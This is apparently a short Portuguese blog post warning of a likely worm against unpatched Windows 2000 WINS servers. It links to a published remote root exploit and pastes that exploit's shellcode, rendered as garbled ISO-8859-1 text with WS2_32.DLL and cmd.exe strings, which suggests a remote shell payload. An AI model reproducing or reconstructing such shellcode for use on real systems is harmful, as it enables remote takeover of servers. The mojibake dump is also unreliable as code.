Em breve: worm contra WINS

Se o exploit que acabo de ver publicado não é fake (ver nota abaixo), o Pai Dinah aqui prevê um worm que vai pegar os servidores win2k não atualizados.

O código foi publicado em http://www.k-otik.com/exploits/20041231.ZUC-WINShit.c.php e recebeu a descrição "ZUCWins 0.1 - Wins 2000 remote root exploit". Admins competentes nem precisarão verificar seus servidores rodando WINS, já que foram atualizados em dezembro.

Nota: Não testei o exploit, mas aparentemente não é fake. A título de curiosidade e pra fingir que eu entendo um código compilado só de abri-lo no notepad, o shellcode a ser executado, quando codificado em ISO-8859-1, é:

ë%éú™ÓwölYlYøœÞŒÑLpÔXFWS2_32.DLL
ëèùÿÿÿ]ƒí,j0Yd‹
‹@
‹p­‹x_<‹
û‹[x
û‹K
ù‹S$
úSQR‹[
û1ÉA1À™‹4‹
þ¬1ÂÑâ„Àu÷¶E DEf9uáf1ZX^VPR+NA· J‹ˆ
ø¶M ‰DØþM u¾þMtþM$]SÿЉÇjXˆE €Ey ë‚P‹E5““““‰Ef‹Ef5““f‰EX‰Î1ÛSSSSVFVÿЉÇUXf‰0jUWÿUàEˆPÿUèUUÿUìD ”Sh.exeh\cmd”1ҍEÌ”WWWSSþÊ
òR”ExPEˆP±SSjþÎRSSSUÿUðjÿÿUä